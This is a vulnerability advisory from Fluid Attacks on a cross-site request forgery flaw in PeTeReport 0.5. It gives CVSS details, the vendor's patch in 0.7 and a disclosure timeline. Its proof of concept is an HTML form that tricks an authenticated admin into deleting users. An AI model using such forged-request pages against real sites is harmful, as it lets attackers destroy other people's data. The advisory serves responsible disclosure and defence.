PeTeReport 0.5 - Cross-site request forgery
Summary
| Name | PeTeReport 0.5 - Cross-site request forgery |
| Code name | |
| Product | PeTeReport |
| Affected versions | Version 0.5 |
| Fixed Versions | Version 0.7 |
| State | Public |
| Release date | 2022-02-23 |
Vulnerability
| Kind | Cross-site request forgery |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:X/RL:X/RC:X |
| CVSSv3.1 Base Score | 4.3 |
| Exploit available | No |
| CVE ID(s) |
Description
PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings on the application.
Proof of Concept
Steps to reproduce
-
Create a malicious html file with the following content.
<html> <body> <script>history.pushState('', '', '/')</script> <!--Change ID --> <form action="https://127.0.0.1/configuration/user/delete/:id"> <input type="submit" value="Submit request" /> </form> </body> </html> -
If an authenticated admin visits the malicious url, the user with the correspond id will be deleted.
System Information
- Version: PeteReport Version 0.5.
- Operating System: Docker.
- Web Server: nginx.
Exploit
There is no exploit for the vulnerability but can be manually exploited.
Mitigation
An updated version of PeteReport is available at the vendor page.
Credits
The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.
References
Vendor page https://github.com/1modm/petereport
Issue https://github.com/1modm/petereport/issues/34
Timeline
2022-02-07
Vulnerability discovered.
2022-02-07
Vendor contacted.
2022-02-09
Vendor replied acknowledging the report.
2022-02-09
Vulnerability patched.
2022-02-23
Public Disclosure.
